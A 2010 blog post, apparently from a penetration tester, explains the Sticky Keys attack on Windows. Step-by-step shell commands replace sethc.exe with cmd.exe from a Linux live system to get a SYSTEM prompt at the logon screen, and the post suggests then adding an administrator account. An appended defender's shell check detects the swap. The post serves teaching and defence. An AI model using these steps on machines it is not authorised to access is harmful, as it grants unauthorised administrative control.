Thursday, March 18, 2010

Physical access == privilege escalation pt 2

This is another method I found out about recently that lets you obtain a command prompt at the logon screen with SYSTEM privileges. If you recall from one of my previous posts, I did the same trick using the utilman.exe replacement method. It turns out there is another exe we can replace to accomplish the same thing: "sethc.exe", the Sticky Keys helper. You replace it with cmd.exe and reboot the computer. When you reach the logon screen, hit the Shift key five times and you are greeted with a command prompt running with SYSTEM privileges.

Quick notes:
  1. Boot any Linux OS (a live CD/USB is enough)
  2. Mount the Windows drive read-write: "mount -t ntfs-3g /dev/sda1 /mnt/sda1"
  3. Navigate to the Windows/System32 folder: "cd /mnt/sda1/Windows/System32"
  4. Rename sethc.exe: "mv sethc.exe sethc.bak"
  5. Copy cmd.exe over the name sethc.exe: "cp cmd.exe sethc.exe"
  6. Flush buffers so the changes hit the disk (optional but safe): "sync"
  7. Reboot the computer: "reboot"
  8. At the logon screen, hit the Shift key 5 times and you should be presented with a command prompt with SYSTEM privileges. From here you might want to create a new user and add them to the Administrators group
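As an added check from the defender's side (not part of the original post): a small POSIX shell function, run from the same live environment with the Windows volume mounted, that reports whether sethc.exe or utilman.exe is a byte-for-byte copy of cmd.exe, or whether the renamed backup from step 4 was left behind. The mount path and file names are assumptions taken from the steps above.

```shell
# Offline integrity check for the two accessibility binaries discussed in this
# and the previous post. Run against the mounted volume, e.g.:
#   check_accessibility_swap /mnt/sda1/Windows/System32   (path is an assumption)
# Prints one line per finding. Returns 0 when clean, 1 when a swap or a
# leftover backup is found, 2 when cmd.exe itself cannot be located.
check_accessibility_swap() {
    sysdir="$1"
    cmd="$sysdir/cmd.exe"
    status=0

    if [ ! -f "$cmd" ]; then
        echo "ERROR: $cmd not found" >&2
        return 2
    fi

    for name in sethc.exe utilman.exe; do
        target="$sysdir/$name"

        # A missing helper is suspicious on its own (it should always exist).
        if [ ! -f "$target" ]; then
            echo "WARN: $target missing"
            status=1
            continue
        fi

        # cmp -s compares the files byte for byte; a straight "cp cmd.exe"
        # swap produces an identical file.
        if cmp -s "$cmd" "$target"; then
            echo "ALERT: $target is byte-identical to cmd.exe"
            status=1
        else
            echo "ok: $target differs from cmd.exe"
        fi

        # The "mv sethc.exe sethc.bak" step leaves this artifact behind.
        base="${name%.exe}"
        if [ -f "$sysdir/$base.bak" ]; then
            echo "ALERT: leftover backup $sysdir/$base.bak found"
            status=1
        fi
    done

    return "$status"
}
```

Full-disk encryption prevents the offline edit in the first place; the check above only tells you whether an unencrypted volume has already been altered.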

References/Good Reading:
Pentestit
